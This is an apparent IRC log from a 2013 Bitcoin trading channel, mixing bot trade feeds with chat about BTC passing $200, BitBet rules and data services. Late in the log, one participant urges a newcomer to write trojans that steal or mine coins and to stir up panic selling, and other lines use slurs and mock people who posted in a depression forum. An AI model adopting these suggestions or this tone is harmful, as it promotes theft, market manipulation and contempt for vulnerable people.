02:32:31 [BTCTC] [ASICMINER-PT] 2 @ 0.7944 = 1.5888 BTC [+] Apr 09 02:35:05 [BTCTC] [PAJKA.BOND] 4 @ 0.1019 = 0.4076 BTC [-] Apr 09 02:35:57 [HAVELOCK] [VTX] 1 @ 0.23999999 BTC [-] Apr 09 02:42:17 ouch Apr 09 02:42:23 !ticker h vtx Apr 09 02:42:25 [HAVELOCK:VTX] 1D: 0.23999999 / 0.33127558 / 0.39000000 (217 shares, 71.88680004 BTC), 7D: 0.23999999 / 0.42829361 / 0.57499999 (1076 shares, 460.84391999 BTC), 30D: 0.23999999 / 0.4328512 / 0.79900000 (13612 shares, 5891.97053324 BTC) Apr 09 02:42:34 what happend there? Apr 09 02:42:34 what happened there Apr 09 02:42:37 lol Apr 09 02:42:40 omfg this guy :D Apr 09 02:42:41 first. Apr 09 02:42:58 hehehe Apr 09 02:43:10 may the bird of paradise fly up your nose! Apr 09 02:43:19 :p Apr 09 02:43:48 (not sure is that good or bad) Apr 09 02:44:01 it's an old song Apr 09 02:44:32 [MPEX] [S.MPOE] 3856 @ 0.00065705 = 2.5336 BTC [+] Apr 09 02:44:34 [MPEX] [S.MPOE] 873 @ 0.00066211 = 0.578 BTC [+] Apr 09 02:44:46 [MPEX] [S.MPOE] 2707 @ 0.00066974 = 1.813 BTC [+] Apr 09 02:47:59 [MPEX] [O.USD.P140T] 718 @ 0.03241474 = 23.2738 BTC [-] Apr 09 02:48:57 [HAVELOCK] [SDICE] 3 @ 0.2721 = 0.8163 BTC [-] Apr 09 02:48:57 [HAVELOCK] [SDICE] 7 @ 0.2721 = 1.9047 BTC [-] Apr 09 02:49:57 [HAVELOCK] [HIM] 1 @ 1.8000001 BTC [-] Apr 09 02:51:13 [BTCTC] [ASICMINER-PT] 2 @ 0.79397 = 1.5879 BTC [-] Apr 09 02:51:25 [BTCTC] [ASICMINER-PT] 1 @ 0.79399 BTC [+] Apr 09 02:51:32 [BTCTC] [ASICMINER-PT] 5 @ 0.794 = 3.97 BTC [+] Apr 09 02:51:57 [HAVELOCK] [VTX] 1 @ 0.21000001 BTC [-] Apr 09 02:51:59 [MPEX] [S.MPOE] 9493 @ 0.00066974 = 6.3578 BTC [+] Apr 09 02:52:56 [HAVELOCK] [VTX] 4 @ 0.21 = 0.84 BTC [-] Apr 09 02:53:30 [BTCTC] [S.DICE-PT] 49 @ 0.00418 = 0.2048 BTC [+] Apr 09 02:56:55 !ticker m s.dice Apr 09 02:56:56 [MPEX:S.DICE] 1D: 0.00276101 / 0.0029175 / 0.00301846 (7205 shares, 21.02 BTC), 7D: 0.00276101 / 0.00315343 / 0.00400173 (467223 shares, 1,473.36 BTC), 30D: 0.00276101 / 0.00364184 / 0.006 (1638027 shares, 5,965.44 BTC) Apr 09 03:01:24 "... Apr 09 03:01:24 Since October 2012, BTC market conditions changed, and our algorithm stop trading, pointing to hold BTCs as the most profit action to be taken. So we did this way, Apr 09 03:01:25 holding BTCs to avoid bad sell from our shareholders. This strategy now proved to be correct and to prize our algorithm. We proud of a very good work. Apr 09 03:01:25 ..." Apr 09 03:01:27 LMAO Apr 09 03:01:32 https://bitcointalk.org/index.php?topic=170003.msg1776817#msg1776817 Apr 09 03:02:37 umm a bitcoin trading company that just holds bitcoins that you could just as easily hold yourself? Apr 09 03:02:54 so wait... Apr 09 03:02:58 for 6 months thios ?! Apr 09 03:03:23 About you trollers , all I have to say is: "clap clap clap clap ! ". May you get it and may it be penicillin resistant. Apr 09 03:07:58 So checking my math sdice has market cap of ~$55,000,000 AM $56,240,000 and bbet about $1,850,000? Apr 09 03:08:57 al seem pretty high, but I think that reflects an expectation of growth in usd/btc ratio. Apr 09 03:09:57 [HAVELOCK] [SDICE] 1 @ 0.2721 BTC [-] Apr 09 03:10:06 [BTCTC] [PAJKA.BOND] 4 @ 0.1019 = 0.4076 BTC [-] Apr 09 03:18:57 hm Apr 09 03:19:01 !ticker m s.bbet Apr 09 03:19:03 [MPEX:S.BBET] 1D: 0.00079521 / 0.00082831 / 0.00085021 (2492 shares, 2.06 BTC), 7D: 0.0007531 / 0.00083127 / 0.00195 (2520 shares, 2.09 BTC), 30D: 0.00050015 / 0.00189327 / 0.00201401 (79740 shares, 150.97 BTC) Apr 09 03:19:32 ;;calc 0.00082831 * 10000000 Apr 09 03:19:33 8283.1 Apr 09 03:19:42 yeh like 8k btc at current prices. Apr 09 03:20:21 course i wouldn't sell it at that. Apr 09 03:21:57 [HAVELOCK] [VTX] 4 @ 0.2199999 = 0.88 BTC [+] Apr 09 03:21:59 [HAVELOCK] [VTX] 3 @ 0.22 = 0.66 BTC [+] Apr 09 03:28:56 [HAVELOCK] [SDICE] 1 @ 0.2721 BTC [-] **** BEGIN LOGGING AT Tue Apr 9 13:46:52 2013 Apr 09 13:47:01 [MPEX] [S.MPOE] 18030 @ 0.00070061 = 12.632 BTC [+] Apr 09 13:47:21 a penny Apr 09 13:47:29 there it is!!! Apr 09 13:47:34 woohoo everyone we just hit 200 Apr 09 13:47:38 yep :P Apr 09 13:47:47 wooooooooo! Apr 09 13:47:51 just lost bet Apr 09 13:47:54 did you guys see ernie with his mind blown? Apr 09 13:47:55 http://bitbet.us/bet/330/mtgox-bitcoin-usd-exchange-rate-200-before/ Apr 09 13:47:56 just won the bet :D Apr 09 13:48:18 woot Apr 09 13:49:19 2K coins exchanged at 200 Apr 09 13:49:25 and counting Apr 09 13:49:33 ;;ticker Apr 09 13:49:34 BTCUSD ticker | Best bid: 200.48000, Best ask: 200.50000, Bid-ask spread: 0.02000, Last trade: 200.40000, 24 hour volume: 97559.81266110, 24 hour low: 172.13000, 24 hour high: 197.48000, 24 hour vwap: 187.02354 Apr 09 13:49:54 http://bitbet.us/bet/330/mtgox-bitcoin-usd-exchange-rate-200-before/ Apr 09 13:49:58 me too Apr 09 13:50:04 now someone resolve it Apr 09 13:50:27 ;;asks 202 Apr 09 13:50:28 heh what's the rush Apr 09 13:50:30 There are currently 881.21269 bitcoins offered at or under 202.0 USD, worth 177205.166732 USD in total. | Data vintage: 0.0011 seconds Apr 09 13:50:33 the "bubble" is alive and well Apr 09 13:50:56 bitcoinity bringing the lulz again Apr 09 13:50:58 at what point do they cease seeing a bubble and start seeing a new price level? Apr 09 13:51:25 lolz Apr 09 13:51:48 bitcoinity is the best channel on tv lol Apr 09 13:52:43 geez, not even a little time to pause and reflect on how far we've come...nope, on to 300 NAO Apr 09 13:57:00 hey does the betting time get re-adjusted for the actual length of the bet? Apr 09 13:57:03 would be fair :) Apr 09 13:57:13 I was Yes days ago Apr 09 13:58:04 yes the weight of your bet will be higher Apr 09 13:59:01 uhh just missed it... anyone has bitcoinity screenshot? Apr 09 13:59:05 I know, but since the weight was given against the Last of April, even last minute better get 50% weighted Apr 09 13:59:47 It should be weighted: start -> end of bet Apr 09 14:00:21 not start -> maximum lifetime of bet. Apr 09 14:00:40 rikur weight's not readjusted, why;'d it be ? Apr 09 14:01:11 also, then bettors betting just before lifetime would get almost 0 weight Apr 09 14:01:18 mircea_popescu: for example this mtgox bet, you get more information as price goes higher and it's less risky to bet yes Apr 09 14:01:23 but the weight is relatively still high Apr 09 14:01:27 yes. Apr 09 14:01:35 so ? Apr 09 14:01:44 lol some bitch weight is too small, others that it is too big Apr 09 14:01:48 jurov: they would get their own money back and a tiny profit on top of that Apr 09 14:01:56 rikur nope Apr 09 14:02:10 huh your algo is not that smart then Apr 09 14:02:19 not a lot holding back from 235 right now...this is getting crazy Apr 09 14:02:22 they will get their money minus house edge Apr 09 14:02:23 the bet was more yes folks than no folks through most of it's life Apr 09 14:02:25 favors last minute bettors who Apr 09 14:02:27 [MPEX] [S.MPOE] 1565 @ 0.00069716 = 1.0911 BTC [-] Apr 09 14:02:28 ;;bids 0 Apr 09 14:02:29 [MPEX] [S.MPOE] 19600 @ 0.00070096 = 13.7388 BTC [+] Apr 09 14:02:29 There are currently 31615980 bitcoins demanded at or over 0.0 USD, worth 12659267.2931 USD in total. | Data vintage: 75.7371 seconds Apr 09 14:02:43 [MPEX] [S.MPOE] 17150 @ 0.00070757 = 12.1348 BTC [+] Apr 09 14:02:43 [MPEX] [S.MPOE] 1085 @ 0.00070898 = 0.7692 BTC [+] Apr 09 14:02:44 ;;asks 235 Apr 09 14:02:44 There are currently 7289.0965 bitcoins offered at or under 235.0 USD, worth 1564703.04003 USD in total. | Data vintage: 91.5550 seconds Apr 09 14:03:08 it doesn't favour anybody. Apr 09 14:03:17 who'd you figure "it favors". Apr 09 14:03:29 jurov: when I bet Yes at around 160$, I was taking much higher risk than last minute 50 BTC bettor don't you agree? Apr 09 14:03:39 not at all Apr 09 14:03:48 it can fall as well as rise Apr 09 14:03:59 so we gonna get a rash of articles talking about 200 and 2 billion Apr 09 14:04:01 lol, but the information the bets are placed has changed Apr 09 14:04:13 ;;bc,mktcap Apr 09 14:04:14 2224267339.89 Apr 09 14:04:28 price has gone insane Apr 09 14:04:30 rikur the fact that the information has changed may make the system inconvenient for oyu Apr 09 14:04:35 btw - kinda glad I lost that bet Apr 09 14:04:35 but it does not make the system unfair in itself. Apr 09 14:04:40 also, i won my fist bitbet Apr 09 14:05:10 in order for it to be unfair it'd have to be unfair in general, not inconvenient to some case. Apr 09 14:05:31 the 140 bettors who bet yes can scrap over my 20 btc.. Apr 09 14:05:31 mircea_popescu: it is unfair in general whenever the bet can end before the max life time Apr 09 14:05:38 https://bitcointalk.org/index.php?topic=171057.0 apparently unfunded orders is going away Apr 09 14:05:44 late bettors gain leverage on more information Apr 09 14:05:54 there should be a rule on bitbet if people try to game the system by putting btc after the event stops Apr 09 14:05:54 rikur they also incur the list on losing their capital Apr 09 14:05:59 it is totally different to bet Yes with 10 BTC early on than 50 BTC on the last minute Apr 09 14:06:02 if the bet closes before theior bet makes it in. Apr 09 14:06:03 you should keep the btc Apr 09 14:06:06 no, it Apr 09 14:06:22 s not just totally different. its very risky to bet 10 at the last minute. Apr 09 14:06:34 far less risky, you gotta admit that Apr 09 14:06:39 rikur if you want the bet weight to reflect tmkt information, you're plainly using wrong instrument Apr 09 14:06:52 trade options instad. Apr 09 14:06:54 it's not far less risky. it's VERY risky. Apr 09 14:07:06 have you read bitbet last month reports ? Apr 09 14:07:13 no Apr 09 14:07:20 half the dividends came from people trying to leech the betpools by betting late. Apr 09 14:07:44 can you link to last month's report? sounds like a good read Apr 09 14:07:45 ;;ticker Apr 09 14:07:46 BTCUSD ticker | Best bid: 203.50001, Best ask: 203.75000, Bid-ask spread: 0.24999, Last trade: 203.99000, 24 hour volume: 103340.65692708, 24 hour low: 172.13000, 24 hour high: 205.00000, 24 hour vwap: 188.16600 Apr 09 14:07:47 so that's why you don't fix it Apr 09 14:07:59 203! Apr 09 14:08:04 joeykrim http://trilema.com/2013/bitbet-march-2013-statement/ Apr 09 14:08:12 mircea_popescu, thx Apr 09 14:08:20 irt's not that "i don;'t fix it". it's that what you're proposing is not a fix, and what i have is. Apr 09 14:09:01 so about 30btc was sent to expired addies??? Apr 09 14:09:24 23 if memory serves Apr 09 14:09:46 it wasn't expired addies, it was more specifically : guy sees bet about to close, sends btc, doesn't make in before close. Apr 09 14:10:00 so what happens if they don't make it Apr 09 14:10:08 btc goes to shareholders. Apr 09 14:10:13 what? Apr 09 14:10:14 lol Apr 09 14:10:19 yep. Apr 09 14:10:26 what a fag site Apr 09 14:10:36 maybe bitcoin is a little new to you. Apr 09 14:10:39 lol Apr 09 14:10:48 the rules are not based on any sane math Apr 09 14:10:53 "Looking for someone to create/modify software for this forum [5500+ BTC] " << bitcointalk now has > 1mn dollars in software devbiounty Apr 09 14:10:53 but it's cool Apr 09 14:10:57 largest in history of internet ? Apr 09 14:11:00 we just happen to have this "sinkhole in foyer, whatever falls in is kept" capitalism here Apr 09 14:11:16 jurov it's incredibly efficient in encouraging people not to litter. Apr 09 14:11:23 [BTCTC] [ASICMINER-PT] 1 @ 0.7749 BTC [+] Apr 09 14:11:46 lol hehe... i'm considering to enact something like Apr 09 14:12:17 oh i already am.. there's a guy who forgot both his coinbr username, password and email Apr 09 14:12:24 ... Apr 09 14:12:33 and wasn't able to produce a btc addy even with hint Apr 09 14:12:35 how do you know you're not being social engineered in a case like that ? Apr 09 14:12:53 i don't know. hence, it will be kept by coinbr Apr 09 14:13:39 mircea_popescu: I can't see this risky last minute bet mentioned on the site Apr 09 14:13:48 read the faq. Apr 09 14:13:59 and still, the weight should be re-calibrated in bets that end earlier Apr 09 14:14:10 to suit you Apr 09 14:14:12 just my feed back as a paying customer :) Apr 09 14:15:11 new bet: will btc trade below 200.. ;) Apr 09 14:15:16 lol Apr 09 14:16:07 or just for fun "bitcoin will fall below $2 in 2013" Apr 09 14:16:36 although, even 1000% profit from such bet would be moot Apr 09 14:17:11 indeed. Apr 09 14:17:26 there's a ton of buying pressure Apr 09 14:17:56 ratio: 362.74 USD/BTC Apr 09 14:18:08 up from 290 during the breakout runup Apr 09 14:18:19 ...and gox api down again? Apr 09 14:18:36 still working for me, the data stream at least Apr 09 14:18:40 lax is next to zero too Apr 09 14:18:43 ;;ticker Apr 09 14:18:43 lag* Apr 09 14:18:44 BTCUSD ticker | Best bid: 199.96722, Best ask: 200.00000, Bid-ask spread: 0.03278, Last trade: 200.00000, 24 hour volume: 104305.48741673, 24 hour low: 172.13000, 24 hour high: 205.00000, 24 hour vwap: 188.36658 Apr 09 14:18:48 ;;goxlag Apr 09 14:18:49 MtGox lag is 3.389127 seconds. During this time, light travels 0.00679177256144 AU. You could have sent a bitcoin from Jupiter to its largest moon, Ganymede (0.007155 AU). Apr 09 14:18:57 I'm looking at bitcoincharts and at mpex.co: no bot quotes? Apr 09 14:18:59 oh no crash Apr 09 14:19:19 ic, bowjob is on it again :) Apr 09 14:19:23 unbalanced_ prolly bitcoincharts crapped out Apr 09 14:19:29 shush. old habits die hard Apr 09 14:19:33 Yeah they're boned now Apr 09 14:19:37 im trying to figure out this mining game Apr 09 14:20:08 "valueerror: need more than 1 value to unpack Apr 09 14:20:38 I registered on slush's pool. i inputted my worker bowjob.worker1 and put whatever password they supplied me Apr 09 14:20:48 then i click mine, and it doesnt seems to work Apr 09 14:20:50 but yeah, not going to bit again on bets like this. unfair rules still, can't understand why you don't agree. Apr 09 14:21:35 How often do the bots sample the bitcoincharts 24hr vwap? Apr 09 14:21:59 bowjob, best to hit the slush irc channel… Apr 09 14:22:01 And how often does bitcoincharts update it? every 15min? hourly? Apr 09 14:22:10 aye. Apr 09 14:22:25 im prepping for my avalon. didnt have too much time to think. Apr 09 14:22:27 just buyyyyy Apr 09 14:22:34 heh Apr 09 14:22:41 i guess ill be spoiled with 4 btc a day Apr 09 14:22:45 mining is hot work... Apr 09 14:22:45 just my observation - bot refreshes somewhere between 5-20 minutes Apr 09 14:22:52 thx Apr 09 14:23:00 bitcoincharts is a bit flaky atm Apr 09 14:23:02 and btcharts vwap seems to be updated continuously Apr 09 14:23:20 or was Apr 09 14:23:37 if it's there, ofc. Apr 09 14:24:09 taub: what's that ratio? Apr 09 14:24:09 but they warn that it shouldn't be fetched more often than every 15min. Apr 09 14:24:26 And when the bots have been blind for X minutes because of a b...charts api crapout, they go to n/a Apr 09 14:24:48 instead of looking around for some cloud/cdn solution to distribute their api Apr 09 14:25:09 Do the the bots wait X minutes on an outage or do they go straight to n/a Apr 09 14:25:43 I remember reading something about stale info a week or two ago and am just trying to grok it now Apr 09 14:25:52 why would they wait? it's risky Apr 09 14:26:30 well.. vwap moves kinda slowly... Apr 09 14:26:31 iirc mp said they place orders with expiration date, they don't actively cancel them Apr 09 14:26:44 bgupta: all usd from the bid vs the coins on the ask Apr 09 14:26:49 http://bitbet.us/bet/307/bfl-will-deliver-asic-devices-before-july-1st/ Apr 09 14:26:55 ah.. Apr 09 14:26:59 lol. reall,y 57 BTC on NO Apr 09 14:27:00 i think it would be funny if one day all the sellers decided to list all their coins at $1010101...for 10 minutes, just to show people that they have to choose to sell Apr 09 14:27:35 iirc mp said they place orders with expiration date, they don't actively cancel them << this is correct. Apr 09 14:27:37 i am more worried about everyone choosing to just say, why bother selling at all... Apr 09 14:27:48 if bot can't find pricing feed / is not sane it just doesn't quote, tries again. Apr 09 14:29:15 can't you ask bitcoinity to provide alternative feed? Apr 09 14:29:55 i'm not using mtgox only feed. Apr 09 14:31:04 [HAVELOCK] [SDICE] 10 @ 0.26 = 2.6 BTC [-] Apr 09 14:31:10 mircea_popescu: Am I observing incorrectly that min/max and volume numbers go away if bots aren't playing? Apr 09 14:31:29 nvm Apr 09 14:31:32 i think you are, yes Apr 09 14:31:55 i know but bitcoinity can make average vwap from these 4 biggest exchanges they have there Apr 09 14:32:16 should be accurate enough for pricing at least, if not for exercises Apr 09 14:32:31 meh. Apr 09 14:32:57 maybe. Apr 09 14:33:01 might be worth running ones own private vwap pricing service.. Apr 09 14:34:09 I'd look at the uptime/downtime numbers of the public one that's used, and see how often it's offline Apr 09 14:34:10 http://imageshack.us/f/571/mtgoxiseebatman.jpg/ Apr 09 14:36:11 bgupta the entire idea is to separate data feeds and market Apr 09 14:36:14 so new seller wall at 205 Apr 09 14:36:16 i'm never running a private one. Apr 09 14:36:32 the community has to get ity's collective useless ass in a bunch and make a working service. Apr 09 14:36:35 absent that, it doesn Apr 09 14:36:39 't actually need options. Apr 09 14:37:01 what's the revenue in running a pricing service? Apr 09 14:37:54 IE: seems a small amount of ad revenue at best. Apr 09 14:38:32 im not sure what you mean by pricing service. Apr 09 14:39:20 while i'm at it, what price is used for exercises when btccharts isn't there? Apr 09 14:39:22 like bitcoincharts, which you use for vwap quotes.. Apr 09 14:39:29 jurov last available. Apr 09 14:39:30 i was wondering about bitcoinity's business model... Apr 09 14:39:41 bgupta irl bloomberg seems to do okay. Apr 09 14:39:51 otherwise, as far as websites go, thuis would be the highest traffic website in btc. Apr 09 14:40:06 granted, a geek might not be mentally capable to turn something useful into something productive. Apr 09 14:40:14 but let him find a boss. Apr 09 14:40:20 and let that boss not be me. Apr 09 14:40:55 i think that if you want to talk about eyeballs on a screen, bitcoinity has that...someone should create the CNBC of bitcoin, and basically just do a youtube channel talking about bitcoin related affairs with great market data in the ticker and sidebar. Apr 09 14:41:24 MJR_ ur doing something too, no? Apr 09 14:41:31 or just another exchange? Apr 09 14:41:34 I appreciate the little easter eggs, and i think people watch bitcoinity pretty religiously Apr 09 14:41:41 hopefully aggregation of data Apr 09 14:41:47 but bootstrapping process Apr 09 14:41:48 tbh i think the model is very good as it is : bitcoinity for the crazed f5 mashing crowd, bitcoincharts for the more in depth universal minded minds. Apr 09 14:41:53 right my point is in this case, I sense that that a solid site could be built, and it would be useful, and get a lot of traffic, but there doesn't seem to be a market yet of folks iwlling to pay for a paywall service.. and ads can only bring in so much. Apr 09 14:42:00 this should work on the long term, stratefgically speaking Apr 09 14:42:51 my plan is not to try and woo current customers but rather find a large pool of new customers, expanding the pie rather than redistributing it Apr 09 14:43:08 sounds like a good plan. Apr 09 14:43:14 (you will redistribute it once you have a certain critical mass anyway) Apr 09 14:43:47 so eventually data services will be a part of that, but for now its trying to get the most bang for the buck Apr 09 14:45:04 I think if someone just read the top stories from reddit, and had a simple feed from this channel on a youtube program, while showing bitcoinity, bitcoincharts, clarkmoody, they could get ad revenue Apr 09 14:46:59 1700 people on the subreddit now... Apr 09 14:47:18 7162 on bitcoinity Apr 09 14:47:19 prhaps. Apr 09 14:47:45 bloomberg started small (i know most people can't believe that these monolithic huge corps were startups at one point) Apr 09 14:48:16 heh. yea. Apr 09 14:48:34 hey mp Apr 09 14:48:34 MJR_ i kept trying to push people towards dfoing a blog, which is a subset of what you say but easier to do (for a geek) Apr 09 14:48:35 http://bitbet.us/bet/392/mtgox-bitcoin-usd-exchange-rate-250-before/ Apr 09 14:48:43 nobody wants to sink the work into anything. Apr 09 14:48:44 For this bet, I posted the exact same bet, i dont see my addy Apr 09 14:48:47 yes Apr 09 14:48:50 ... were there 2 bets? Apr 09 14:48:52 and it does take work and capital Apr 09 14:48:56 people just want to dick around pressing f5 on some imaginary "getting rich" thing Apr 09 14:49:11 bowjob tis possible. Apr 09 14:49:16 and right now everyone is waiting for everyone else to start the business that they can have as a customer, but they won't start it till they have the services they need Apr 09 14:49:16 mhm Apr 09 14:49:28 aye, same exact lazy copypasta as mine Apr 09 14:49:29 lol Apr 09 14:50:01 bloomberg started with 10 mil and 22 terminals Apr 09 14:50:09 MJR_ where "the services they need" = other people doing all the work so they can just repackage it and pretend to be apple./ Apr 09 14:50:14 tyvm but that is not useful. Apr 09 14:50:14 which may seem like a lot of cash, but it isn't really in the grand scheme of where they are now Apr 09 14:50:44 ^^^which? Apr 09 14:51:29 mircea_popescu: I agree, don't need repackagers, need people willing to work Apr 09 14:51:59 other than people who code there doesn't really seem to be any group in the us with any sort of work ethic. Apr 09 14:52:06 and the people who code have monstrous ego issues. Apr 09 14:52:12 it's a conundrum i tell ye. Apr 09 14:54:33 it really is Apr 09 14:54:56 only way is for someone to do what you did in other spaces Apr 09 14:55:00 become the foundation Apr 09 14:55:14 ugh, i don't mean like the bitcoin foundation Apr 09 14:55:17 bowjob there were two bets, one had a zeroconf in it and was picked. Apr 09 14:55:32 zeroconf? Apr 09 14:55:35 i mean like a solid base for other people to build an economy around Apr 09 14:55:51 i assume the other guy put some btc in, thats why his got accepted Apr 09 14:55:57 is this me or btc-e trades are not working currently? Apr 09 14:56:07 aye, thats fine.. kk Apr 09 14:57:07 bowjob yea, you may send btc along with your bet Apr 09 14:57:17 which for whatever reasons is called zeroconf in bitbet internals Apr 09 14:59:00 we need job creators lol, 10 million --> 22.5 billion Apr 09 14:59:09 https://bitcointalk.org/index.php?topic=142318.0 Apr 09 14:59:12 I love this thread Apr 09 14:59:37 "Topic: I'm calling the top here @ $23.98961" Apr 09 15:00:44 lol Apr 09 15:01:12 *respect* Apr 09 15:01:47 john banned him, aw sucks Apr 09 15:01:59 that was a hilarious thread Apr 09 15:02:08 each new round number in big funny fonts Apr 09 15:03:01 it used to be him trolling, then I turned the thread about cats... then somehow it tured out to be an ATH thread Apr 09 15:03:31 mircea_popescu: do you still believe BTC is not worth 130+? Apr 09 15:03:31 [MPEX] [O.USD.C185T] 10 @ 0.21192633 = 2.1193 BTC [+] Apr 09 15:03:45 $avg Apr 09 15:03:47 thestringpuller: 188.04 Apr 09 15:04:21 the text said "yet". Apr 09 15:04:55 taub: wondering if that ratio thing is a red herring.. and just a natural result of what happens when price goes up.. IE: people don't set out to sell a fixed number of coins, but rather they are selling to raise a certain amount of fiat to pay for bills/toys.. and in btc terms those keep getting cheaper as btc rallies. Apr 09 15:05:38 mircea_popescu: so time in bitcoin is accelerated 1000x to real life? Apr 09 15:05:40 :D Apr 09 15:05:43 jkjk Apr 09 15:05:48 mircea_popescu, mah nigga Apr 09 15:06:33 bgupta may be a good point yes Apr 09 15:07:42 so press has noticed 200, haven't seen much talk of $2billion http://www.theglobeandmail.com/report-on-business/ Apr 09 15:07:48 thestringpuller http://trilema.com/2013/let-me-show-you-how-right-i-am/ Apr 09 15:07:50 rthere, just for you. Apr 09 15:07:59 bgupta technically it's 2.22 bn Apr 09 15:08:26 yeah.. but the crossing of the threshold.. over 2 billion.. blah Apr 09 15:08:58 MJR_ is your site in private testing yet? Apr 09 15:09:17 What do you code in? Apr 09 15:09:28 bgupta: i haven't found out any correlation yet, but it's cute to look at Apr 09 15:09:45 I completely agree about finding people willing to Do The Work. Apr 09 15:09:50 Not easy. Apr 09 15:09:51 [MPEX] [S.MPOE] 13500 @ 0.00070898 = 9.5712 BTC [+] Apr 09 15:09:59 ;;ticker Apr 09 15:10:03 BTCUSD ticker | Best bid: 204.50000, Best ask: 204.60000, Bid-ask spread: 0.10000, Last trade: 204.60000, 24 hour volume: 106092.82752189, 24 hour low: 172.13000, 24 hour high: 207.00000, 24 hour vwap: 188.99308 Apr 09 15:10:11 nice price Apr 09 15:10:11 too bad I'm still behind the paywall :D Apr 09 15:10:13 So we just have to do it ourselves. Apr 09 15:10:57 aww Apr 09 15:19:05 woo. almost my cakeday Apr 09 15:19:36 21 years of doing absolutely jack shit. Apr 09 15:20:24 you never got any chick pregnant ? Apr 09 15:21:41 nah. i had this classmate knock a girl up when he was in hs. he's not so free these days Apr 09 15:22:05 and i hate babies. all they do is shit around Apr 09 15:24:02 cavirtex is at 219 Apr 09 15:24:03 mhm Apr 09 15:26:23 well i didn't mean she'd keep it necessarily. Apr 09 15:31:03 [HAVELOCK] [VTX] 1 @ 0.266 BTC [-] Apr 09 15:31:05 [HAVELOCK] [VTX] 2 @ 0.265 = 0.53 BTC [-] Apr 09 15:31:06 [HAVELOCK] [VTX] 6 @ 0.261 = 1.566 BTC [-] Apr 09 15:31:07 [HAVELOCK] [VTX] 1 @ 0.26000011 BTC [-] Apr 09 15:31:08 [HAVELOCK] [VTX] 1 @ 0.2600001 BTC [-] Apr 09 15:31:09 [HAVELOCK] [VTX] 4 @ 0.26 = 1.04 BTC [-] Apr 09 15:31:10 [HAVELOCK] [VTX] 2 @ 0.25982367 = 0.5196 BTC [-] Apr 09 15:31:12 [HAVELOCK] [VTX] 1 @ 0.245 BTC [-] Apr 09 15:31:13 [HAVELOCK] [VTX] 3 @ 0.24 = 0.72 BTC [-] Apr 09 15:32:00 VTX.. what are you doing Apr 09 15:32:02 stahp Apr 09 15:33:03 [HAVELOCK] [SDICE] 1 @ 0.261 BTC [+] Apr 09 15:33:05 [HAVELOCK] [SDICE] 5 @ 0.26 = 1.3 BTC [-] Apr 09 15:33:05 [HAVELOCK] [SDICE] 2 @ 0.258101 = 0.5162 BTC [-] Apr 09 15:33:06 [HAVELOCK] [SDICE] 1 @ 0.25810002 BTC [-] Apr 09 15:33:07 [HAVELOCK] [SDICE] 9 @ 0.258 = 2.322 BTC [-] Apr 09 15:33:08 [HAVELOCK] [SDICE] 3 @ 0.258 = 0.774 BTC [-] Apr 09 15:33:10 [HAVELOCK] [SDICE] 1 @ 0.2566 BTC [-] Apr 09 15:33:11 [HAVELOCK] [SDICE] 35 @ 0.251 = 8.785 BTC [-] Apr 09 15:33:12 [HAVELOCK] [SDICE] 2 @ 0.25 = 0.5 BTC [-] Apr 09 15:33:13 [HAVELOCK] [SDICE] 10 @ 0.25 = 2.5 BTC [-] Apr 09 15:34:06 asciilifeform hey, I would love to work with BTC but I am poor. MP said I should talk to you Apr 09 15:34:54 [MPEX] [S.DICE] 500 @ 0.00302126 = 1.5106 BTC [-] Apr 09 15:35:32 Insaneatyou: work on evil things. Trojans that steal BTC/LTC or mine; more efficient ways to brute-force SHA256; attacks on the network; and the like. Apr 09 15:35:45 Insaneatyou: one example: http://jheusser.github.com/2013/02/03/satcoin.html Apr 09 15:36:04 asciilifeform: My skills are not in programming Apr 09 15:36:16 but I'd like to pointout, i already mentioned this to MP Apr 09 15:36:24 Insaneatyou: the common pattern here is that "money makes money" doesn't apply here; having more BTC (or USD) does not give you an advantage in purely intellectual battles Apr 09 15:36:35 Insaneatyou: what *can* you do? Apr 09 15:36:45 Insaneatyou: are you skilled in mathematics? Apr 09 15:37:03 [HAVELOCK] [SDICE] 7 @ 0.25 = 1.75 BTC [-] Apr 09 15:37:07 Insaneatyou: how about stage magic? cold reading? can you fool people convincingly? Apr 09 15:37:15 [MPEX] [S.DICE] 700 @ 0.00302126 = 2.1149 BTC [-] Apr 09 15:37:25 I hate people but make a fair to middling salesman Apr 09 15:37:34 I'm best at solving complex problems Apr 09 15:37:40 but sadly I have no specific math skills Apr 09 15:37:48 [MPEX] [S.MPOE] 1700 @ 0.00068902 = 1.1713 BTC [-] Apr 09 15:37:51 [MPEX] [S.MPOE] 6100 @ 0.00068626 = 4.1862 BTC [-] Apr 09 15:37:57 I'm apparently the worst at selling myself Apr 09 15:38:03 Insaneatyou: drum up an exit stampede from BTC, then. so that you (and the rest of us) can load up a bit. Apr 09 15:38:15 but to be honest, I'm looking to study Economics, that's my area of interest Apr 09 15:38:45 lol Apr 09 15:38:51 best at solving complex problems but no math skills !? how exactly does this work ? Apr 09 15:38:58 My plan was to load up after the price drops from it's highs Apr 09 15:39:17 I did much math before, but haven't used it in a while, i also used to code some Apr 09 15:39:51 but can you give an example of such a problem ? Apr 09 15:39:51 I hate headlines like this that don't have a matching story http://www.nysun.com/national/boom-in-bitcoins-challenges-bernanke-amid-sagging/88262/ Apr 09 15:40:07 ask for advice here. http://www.reddit.com/r/depression/ Apr 09 15:40:08 i didn't even know there was a ny sun Apr 09 15:40:29 "Finding a date and/or a job while completely convinced you are a worthless piece of garbage... how do you do it?" Apr 09 15:40:33 dude i should hang out there more. Apr 09 15:40:48 i like people who know they're worthless pieces of garage. Apr 09 15:40:53 mircea_popescu: perhaps drugs are the answer. Apr 09 15:40:54 ;;ticker Apr 09 15:40:55 BTCUSD ticker | Best bid: 206.01001, Best ask: 206.29959, Bid-ask spread: 0.28958, Last trade: 206.29959, 24 hour volume: 103646.77817016, 24 hour low: 172.13000, 24 hour high: 207.00000, 24 hour vwap: 189.53950 Apr 09 15:41:10 asciilifeform what happened to love you dark van gogh spirit you Apr 09 15:41:48 mircea_popescu: of the 'performance enhancing' kind Apr 09 15:42:02 oic Apr 09 15:42:03 [HAVELOCK] [VTX] 1 @ 0.22 BTC [-] Apr 09 15:42:30 To be honest, i dont have any examples. If you have a problem, hit me with it. I'll give it a shot Apr 09 15:42:46 remove the "looking to" from this sentence. "but to be honest, I'm looking to study Economics, that's my area of interest" Apr 09 15:42:51 "I feel like I can't talk to anyone, because my own problems are stupid and insignificant, because I am stupid and insignificant." Apr 09 15:42:53 dude totally. Apr 09 15:43:07 Insaneatyou: empty your penny jar, and buy one bitcoin. write a trading bot and see if you can turn it into two. Apr 09 15:43:29 how have i not seen this before. Apr 09 15:43:35 I recommend watching clark 